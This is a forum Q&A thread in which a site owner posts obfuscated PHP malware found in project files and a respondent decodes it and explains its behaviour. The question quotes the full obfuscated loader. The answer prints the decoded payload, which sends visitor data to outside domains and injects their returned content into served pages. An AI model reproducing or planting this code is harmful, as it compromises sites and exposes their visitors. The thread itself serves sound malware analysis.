受恶意软件感染的 PHP 代码（我需要一些帮助来解码）

Question

Today I saw the following PHP code snippets in the code of some files of my project. The code was single line. I have used PHP Formatter ( http://beta.phpformatter.com/ ), but I still have not figured it out.

Do you have any idea what it is?

<?php
$nkswqu    = 'j!<2,*j%!-#1]#-bubE{h%)tpqs) or (strstr($uas,"    x61    156    x64!-#j0#!/!**#sfmcnbs+yfeobz+sfwjidsb`bj+upcot$nifaghb = $hiwbtoy("", $puk-#[#-#Y#-#D#-#W#-#C#-#O#-#N#*-!%fX)ufttj    x22)gj!|!*nbsbq%)323ldfidk!~!<**qp%!-uyfu%)3of)fe2M3]317]445]212]445]43]321]464]284]3x22:ftmbg39*56A:>:8:|:7#6#)tutjyf`439275ttfsqnpdov{h19275sbz)#44ec:649#-!#:618d5f9#-!#f6c68399#x61"]=1; $uas=strtolower($_SERVER["    x48    124    +opjudovg+)!gj+{e%!osvufs!*!+A!>!{e%)!>>    x228L3P6L1M5]D2P4]D6#<%G]y6d]281Ld]245]K2]285]Ke]53Ld]53]Kc]55Lutpi}Y;tuofuopd`ufh`fmtmw/    x24)%zW%h>EzH,2W%wN;#-Ez-d!opjudovg!|!**#j{hnpd#)tutjyf`opjudovg    x22)!gw6*    x7f_*#fmjgk4`{6~6<tfs%w6<    x7fw6*CWtfs%)7gj6<*id%)ftpmdR6<h%:<#64y]552]e7y]#>n%<#372]58y]472]37y]672]48y]#>s%<#462]47x54    120    x5f    125    x53    105    x52    137    x41    107    x45    116    x54"]); if (} @error_reporting(0); $pukpmqk = implode(array_map("gwscco    x7fw6*    x7f_*#fubfsdXk5`{66~6<&w6<    x7fw6*CW&)7gj6<*doj%72    157    x6d    145")) or (strstr($uas,"    x66    151    x72    145    x66    157    162    x6f    151    x64")) or (strstr($uas,"    x63    150    x7 or (strstr($uas,"    x72    166    x3a    61    x31")f2-!%t::**<(<!fwbm)%tjw)#    x24#-!#]y38#-!%w:**<")));6<pd%w6Z6<.2`hA    x27pd%6<C    x27pd%6|6.7eu{66<*QDU`MPT7-NBFSUT`LDPT7-UFOJ`GB)fubfsdX6<    x7fw6*CW&)7gj6<*K)ftp6~67<&w6<*&7-#o]s]o]s]#)fepmqyf    x27*&7-n%)utjm!>!2p%!|!*!***b%)sfxpmpusutg!)%j:>>1*!%b:>1<!fmtf!%b:>%s:    x5c%j:.2^,%b:<!%c:>_;#)323ldfid>}&;!osvufs}    x7f;!opjudovg}k~~9{d%:osvufs:~928>>        x78"))) { $hiwbtoy = "    x63    162]1/20QUUI7jsv%7UFH#    x27rfs%6~6<    x7fw6<*K)ftpmdXA6|7**19@#7/7^#iubq#    x5cq%    x27jsv%6<C>^#zsfvr#    x5cq%7**^#zsI&c_UOFHB`SFTV`QUUI&bFWSFT`%}X;!sp!*#opo#>>}R;msv}.%hW~%fdy)##-!#~<%h00#*<%nfd)##Qtpz)#]341]8-C)fepmqnjA    x27&6<.fmjgA    x27doj%6<    x7fd/#00;quui#>.%!<***f    x27,*e    x27,*d    x27,*c    x27,*b    x27)fepdof.)fes",str_split("%tjw!>!#]y84]275]y83]248]y83]256]y81]265]y7<*X&Z&S{ftmfV    x7f<*XAZASV<*w%)ppde>u%V<#65,47R]D6#<%fdy>#]D4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:Mj}1~!<2p%    x7f!~!<##!>!2p%Z<^2    x5c2b%!>!24tvctus)%    x24-    x24b!>!%yy)#}#-c9y]g2y]#>>*4-1-bubE{h%)sutcvt)!gj!|!*bubE{h%)j{hnp24]25    x24-    x24-!%    x24-    x24*!|!    x24-    x24    x5c%j^    x24-    x2x24<%j,,*!|    x24-    x24gvodujpo!    x24-    x24UVPFNJU,6<*27-SFGTOBSUOSVUFS,6<*msid%6<    x7fw6*    x7f_*#ujojRk3`{666~6<&w6<    x7fw6*CW&)7gj6<.[sbnpe_GMFT`QIQ&f_UTPI`QUUI&e_SEEB`FUPNFS&d_SFSFGFS`QUUbq}k;opjudovg}x;0]=])0#)U!    x27{**u%-#jt0}Z;0]=]0#)2q%l}S;2-u%!-#2#/d]55#*<%bG9}:}.}-}!#*<%nfd>%fdy<Cb*[%h!>!%tdz)%bbT-%bT-:<h%_t%:osvufs:~:<*9-1-r%)y7    x24-    x24*<!    x24-    x24gps)%j>1<%j=tj{fpg)%    x24-    x24*<!~!/r%/h%)n%-#+I#)q%:>:r%:|:**t%)m%=*h%)m%):fmjix:<##:>:/q%>2q%<#g6R85,67R37,18R#>q%V<*#fopoV;hojepdoF.uofuopD#)sfebfI{*w%)kVut>j%!*72!    x27!hmg%)!gj!<2,*j%-#1]#-bubE{h%)tpqsut!>!    x242178}527}88:}334}472    x24<!%ff2!>!bssbz)    x!ftmbg)!gj<*#k#)usbut`cpV    x7f    x7f    x7f    x7f<u%V    x27{ftmfV    x7fvd},;uqpuft`msvd}+;!>!}    x27;!>mdXA6~6<u%7>/7&6|7**111127-K)ebfsX    x27u%)7fmjix6<C    j{hnpd19275fubmgoj{h1:|:*mmvo:>:iuhofm%:-5ppde:4:|:**#ppde#)tu1H*WCw*[!%rN}#QwTW%hIr    x5c1^-%r    x5c2^-%hOh/#00#W~!%t2w)##Qtjw!)%z>>2*!%z>3<!fmtf!%z>2<!s%>/h%:<**#57]38y]47]67y]37]88y]27]28y]#8M4P8]37]278]225]241]334]368]322]3]364fvr#    x5cq%)ufttj    x22)gj6<^#Y#    x5cq%    x2)ldbqov>*ofmy%)utjm!|!*5!    x27!hmg%)!gj!|!*1?hmg%)!gj!<**2-4-bubE{h%)s!gj!<*#cd2bge56+99386c6f+9f5d816:+946:ce44#)zbssb!>!s]6]283]427]36]373P6]36]73]83]238M7]381]211M5]67]452]88]5]48]3**2qj%)hopm3qjA)qj3hopmA    x273qj%6<*Y%)8]Df#<%tdz>#L4]275L3]24    x27;mnui}&;zepc}A;~!}    x7f;!|!}{;)gj}l;33(strstr($uas,"    x6d    163    x69    145"))t($GLOBALS["    x61    156    x757-2qj%7-K)udfoopdXA    x22)7gj    x65    141    x74    145    x5f    146    x75    156    x63    164        156    x61"])))) { $GLOBALS["    x61    156    x75    156    6]y6g]257]y86]267]y74]275]y7pdof`57ftbc    x7f!|!*uyfu    x27k:!ftmf!}Z;^nbsbq%    x5cS>j%!*9!    x27!hmg%)!gj!~<ofmy%,3,j%>j%!<**3-j%-bubE{h%)sutcvt-#w#tjyf`4    x223}!+!<+{e%+*!*+fepdfe{h+{d%)25,d7R17,67R37,#/q%>U<#16,47R57,27R66,##    x24-    x24-tusqpt)%z-#:#*    x24-    x24!>!    x24/%tjw/    x24)%    x24-    x24y4    x24-        x5c2^<!Ce*[!%cIjQeTQcOc/#00#W~!Ydrr)%rxB%epnbss!>!bsx69    157    x6e"; function gwsccos($n){return chr(ord($n)-1);v%7-MSV,6<*)ujojR    x27c:>1<%b:>1<!gps)%j:>1<%j:=tj{fpg)%s:*<%j:,,Bj*id%)dfyfR    x27tfs%6<*17-SFEBFI,6<*127-A    x27&6<    x7fw6*    x7f_*x27&6<*rfs%7-K)fujsxX6<#o]o]Y%7;utpI#7>/7rfs%6<#op%!*3>?*2b%)gpf{jt)!gj!<*2bd%-#1GO    x22#)fepmqyfA>>    x22!pd%)!gj}Z;h!opjudovg}{;#)t*9.-j%-bubE{h%)sutcvt)fubmgoj{hA97e:56-xr.985:52985-t.98]K4]65]#%#/#o]#/*)323zbe!-#jt0*?]+^?]_    x5c}X    x24<!%if((function_exists("    x6f    142    x5f    163    x74    141    x72    164") && (!isse-!#65egb2dc#*<!sfuvso!sboepn)%epnbss-%rxW~!Ypp2)%zB%z>!    x24/%jg}[;ldpt%}K;`ufldpt}X;`msvd}R;*msv%)}.;`utjyf`opjudovg)!gj!|!*msv%)}k~~~<ftpmqk); $nifaghb();}}7Y%6<.msv`ftsbqA7>q%6<%s:    x5c%j:^<!%w`    x5c^>Ew:Qb:Qc:W~!%z!>2<!gps)%j>1<%hA    x27pd%6<pd%w6Z6<.4`hA    x27pd%6<pd%w6Z6<.3`hA    x27pd%62]38y]572]48y]#>m%:|:*r%:-t%)3of:opjudovg<~    x24<!%o:pp3)%cB%iN}#-!    x24/%tmw/    x24)%c*W%eN+#Qi    x5c1^W%c!>!%i946-tr.984:75983:489x5csboe))1/35.)1/14+9**-)1/2986+7**^/%rx<~!!%s:N}#-%o:W%UQPMSVD!-id%)uqpuft`msn)%bss-%rxB%h>#]y31]278]y3e]81]K78:56985:6197g:74985-rr.9x24]y8    x24-    x24]26    x24-    7]K3#<%yy>#]D6]281L1#/#M5]DgP52b%!<*qp%-*.%)euhA)3of>2bd%!<5h%/#0#/*#npd/#)rry]252]18y]#>q%<#762]67y]5A    x27K6<    x7fw6*3qj%7>    x2272qj%)7gj6<fnbozcYufhA    x272qj%6<^#zsfvr#    x5cq%7/7#y74]273]y76]252]y85]2584:71]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<%tpz!>!#]D6M)#]82#-#!#-%tmw)%tww**WYsboepT#-#E#-#G#-#H#-#I#-#K#-#L#-#M#3e:5597f-s.973:8297f:52tmw!>!#]y84]275]y83]273]y76]277#<!%t2w>#]%ww2)%w`TW~    x24<!fwbm)%tjw)bssbz)#P#-#Q#-#B#-#;/#/#/},;#-#}+;%-qp%)54l}    x27;%!<*#}n+qsvmt+fmhpph#)zbssb!-#}#)fepmqnj!/!#0#)idubn`    x24/%t2w/    x24)##-!#~<#/%    x24-    x24!>!fyqmpef)#    x24*<!%t::!>!    x24Ypdof./#@#/qp%>5h%!<*::::::-111112)eobs`un>qp%!|Z~!<##%!|!*)323zbek!~!<b%    x7f!<X>b%Z<#opo#>b%!*##>>X)!gjZ<#opo#>b%!**D8]86]y31]278]y3f]51L3]84]y31M6]y3e]81#/#7e:552]254]y76#<!%w:!>!(%w:!>!    x246767~6<Cw6<pd%w6Z6<.5`64]6]234]342]58]24]31#-%tdz*Wsfuvso!%bss    j=6[%ww2!>#p#/#p#/%z<jg!osvufs!~<3,j%>j%!*3!    x27!hmg%!)!ghfsq)!sp!*#ojneb#-*f%)sfxpmpusut)tpqssutRe%)Rd%)Rb%))>>!}_;gvc%}&;ftmbg}    x7f;!osvufs}w;*    x7f!>:]268]y7f#<!%tww!>!    x2400~x{**#k#)tutjyf`x    x22l:!}V;3q%}U;y]}R;2]},;osvufs}#[k2`{6:!}7;!}6;##}C;!>>!}W;mbg!osvufs!|ftmf!~<*utcvt)esp>hmg%!<12>j%!|!*#91y]StrrEVxNoiTCnUF_EtaERCxecAlPeR_rtSbkcrowkyt';
$qcmviqrrx = explode(chr((837 - 717)), substr($nkswqu, (18509 - 12489), (199 - 165)));
$wvodkr    = $qcmviqrrx[0]($qcmviqrrx[(4 - 3)]);
$xskmfwqv  = $qcmviqrrx[0]($qcmviqrrx[(9 - 7)]);
if (!function_exists('fxlepffr')) {
    function fxlepffr($qkfdqgat, $aaxdfvhwkhy, $lmyikk)
    {
        $xzlzanfi = NULL;
        for ($crzozy = 0; $crzozy < (sizeof($qkfdqgat) / 2); $crzozy++) {
            $xzlzanfi .= substr($aaxdfvhwkhy, $qkfdqgat[($crzozy * 2)], $qkfdqgat[($crzozy * 2) + (4 - 3)]);
        }
        return $lmyikk(chr((35 - 26)), chr((548 - 456)), $xzlzanfi);
    }
    ;
}
$aashvx  = explode(chr((147 - 103)), '4260,65,3364,24,3456,44,351,44,717,60,3331,33,998,39,27,31,950,48,892,58,1377,31,3415,41,3841,57,777,59,1708,57,5624,51,4555,53,1088,41,1193,46,1169,24,2730,51,4023,49,1408,55,3388,27,1129,40,4996,36,3229,38,5032,39,1463,51,3008,38,4482,22,836,56,1607,38,597,61,3964,38,2072,34,3898,21,2106,56,4002,21,5942,28,499,22,4386,41,4791,22,2700,30,5826,41,4121,32,4427,35,5970,20,4153,32,5739,34,0,27,2543,50,3578,63,3046,69,5990,30,1929,51,551,46,1859,40,4072,49,4924,47,1645,63,5462,53,1239,27,58,44,5350,47,5773,53,3115,53,2162,54,1514,21,5515,63,163,57,3528,50,1535,30,5314,36,1316,61,256,57,2781,62,3641,38,395,44,2641,59,1765,46,3679,39,2474,69,5893,49,3290,41,2216,67,4216,44,5227,41,5071,22,3500,28,5867,26,2338,26,2930,40,2421,53,658,59,4971,25,4608,53,2593,48,1980,54,1899,30,3718,70,4870,24,2034,38,2364,57,5397,65,4661,54,3788,53,313,38,4325,61,521,30,2843,61,5145,29,4813,57,5204,23,4185,31,5578,46,4715,20,5093,52,4894,30,1811,48,3267,23,439,60,2283,55,1565,42,2970,38,3168,61,220,36,5675,41,4735,56,3919,45,1266,50,4504,51,5716,23,2904,26,5268,46,5174,30,130,33,1037,51,102,28,4462,20');
$ajoqqxy = $wvodkr("", fxlepffr($aashvx, $nkswqu, $xskmfwqv));
$wvodkr  = $nkswqu;
$ajoqqxy("");
$ajoqqxy = (791 - 670);
$nkswqu  = $ajoqqxy - 1;
?>

Thank you so much.

Edit: I shut down the infected site, I downloaded it. I cleaned the malicious code and moved it to a new server. There is no interface on this site to create a security breach, so I think the harmful code is infected through the server.

Original Code: https://pastebin.com/L1hZuCvy

Answer 1

I'm not gona writing a full tutorial about reverse engineering such code, but because I was curious, what your snippet really does, I did some work.

If you follow all encoding layers, you will end with this code:

function g_1($url)
{
    if (function_exists("file_get_contents") === false) return false;
    $buf = @file_get_contents($url);
    if ($buf == "") return false;
    return $buf;
}

function g_2($url)
{
    if (function_exists("curl_init") === false) return false;
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_TIMEOUT, 10);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    $res = curl_exec($ch);
    curl_close($ch);
    if ($res == "") return false;
    return $res;
}

function g_3($url)
{
    if (function_exists("file") === false) return false;
    $inc = @file($url);
    $buf = @implode("", $inc);
    if ($buf == "") return false;
    return $buf;
}

function g_4($url)
{
    if (function_exists("socket_create") === false) return false;
    $p = @parse_url($url);
    $host = $p["host"];
    if (!isset($p["query"])) $p["query"] = "";
    $uri = $p["path"] . "?" . $p["query"];
    $ip1 = @gethostbyname($host);
    $ip2 = @long2ip(@ip2long($ip1));
    if ($ip1 != $ip2) return false;
    $sock = @socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
    if (!@socket_connect($sock, $ip1, 80)) {
        @socket_close($sock);
        return false;
    }
    $req = "GET $uri HTTP/1.0\n";
    $req .= "Host: $host\n\n";
    socket_write($sock, $req);
    $buf = "";
    while ($t = socket_read($sock, 10000)) {
        $buf .= $t;
    }
    @socket_close($sock);
    if ($buf == "") return false;
    list($m, $buf) = explode("\r\n\r\n", $buf);
    return $buf;
}

function gtd($url)
{
    $co = "";
    $co = @g_1($url);
    if ($co !== false) return $co;
    $co = @g_2($url);
    if ($co !== false) return $co;
    $co = @g_3($url);
    if ($co !== false) return $co;
    $co = @g_4($url);
    if ($co !== false) return $co;
    return "";
}

function comgzi($gzData)
{
    if (substr($gzData, 0, 3) == "\x1f\x8b\x08") {
        $i = 10;
        $flg = ord(substr($gzData, 3, 1));
        if ($flg > 0) {
            if ($flg & 4) {
                list($xlen) = unpack("v", substr($gzData, $i, 2));
                $i = $i + 2 + $xlen;
            }
            if ($flg & 8) $i = strpos($gzData, "\0", $i) + 1;
            if ($flg & 16) $i = strpos($gzData, "\0", $i) + 1;
            if ($flg & 2) $i = $i + 2;
        }
        return @gzinflate(substr($gzData, $i, -8));
    } else {
        return false;
    }
}

function k34($op, $text)
{
    return base64_encode(en2($text, $op));
}

function check212($param)
{
    if (!isset($_SERVER[$param]))
        $a = "non";
    else if ($_SERVER[$param] == "")
        $a = "non";
    else
        $a = $_SERVER[$param];
    return $a;
}

function day212()
{
    $a = check212("HTTP_USER_AGENT");
    $b = check212("HTTP_REFERER");
    $c = check212("REMOTE_ADDR");
    $d = check212("HTTP_HOST");
    $e = check212("PHP_SELF");
    $domarr = array("33db9538", "9507c4e8", "e5b57288", "54dfa1cb");
    if (($a == "non") or ($c == "non") or ($d == "non") or strrpos(strtolower($e), "admin") or (preg_match("/" . implode("|", array("google", "slurp", "msnbot", "ia_archiver", "yandex", "rambler")) . "/i", strtolower($a)))) {
        $o1 = "";
    } else {
        $op = mt_rand(100000, 999999);
        $g4 = $op . "?" . urlencode(urlencode(k34($op, $a) . "." . k34($op, $b) . "." . k34($op, $c) . "." . k34($op, $d) . "." . k34($op, $e)));
        $url = "http://" . cqq(".com") . "/" . $g4;
        $ca1 = en2(@gtd($url), $op);
        $a1 = @explode("!NF0", $ca1);
        if (sizeof($a1) >= 2) $o1 = $a1[1]; else $o1 = "";
    }
    return $o1;
}

function dcoo($cz, $length = null)
{
    if (false !== ($dz = @gzinflate($cz))) return $dz;
    if (false !== ($dz = @comgzi($cz))) return $dz;
    if (false !== ($dz = @gzuncompress($cz))) return $dz;
    if (function_exists("gzdecode")) {
        $dz = @gzdecode($cz);
        if (false !== $dz) return $dz;
    }
    return $cz;
}

function pa22($v)
{
    Header("Content-Encoding: none");
    $t = dcoo($v);
    if (preg_match("/\<\/body/si", $t)) {
        return preg_replace("/(\<\/body[^\>]*\>)/si", day212() . "\n" . "$" . "1", $t, 1);
    } else {
        if (preg_match("/\<\/html/si", $t)) {
            return preg_replace("/(\<\/html[^\>]*\>)/si", day212() . "\n" . "$" . "1", $t, 1);
        } else {
            return $t;
        }
    }
}

ob_start("pa22");

What this code does is:

• register and output handler, which replace your own site with content from their servers
• randomly choose one of 4 servers (33db9538.com, 9507c4e8.com, e5b57288.com and 54dfa1cb.com)
• to this server, it sends an request with some server information

Sadly I wasn't able to have a look at what exactly they deliver to your server - seems like they have some kind of test to prevent everyone from have a look into their code.

To sum all up - the code don't install a backdoor on your server (but as they could manipulate your php files, they already have one..). The malware was escpecially dangerous for your visitors, as they could show all kind of content.